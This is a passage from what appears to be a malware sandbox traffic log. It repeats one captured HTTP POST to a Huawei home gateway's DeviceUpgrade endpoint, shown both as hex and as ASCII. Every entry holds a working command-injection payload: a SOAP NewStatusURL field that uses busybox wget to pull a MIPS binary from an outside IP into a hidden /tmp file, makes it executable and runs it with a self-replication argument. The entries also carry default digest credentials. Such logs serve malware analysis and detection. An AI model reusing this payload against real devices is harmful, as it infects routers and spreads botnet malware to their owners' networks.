2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 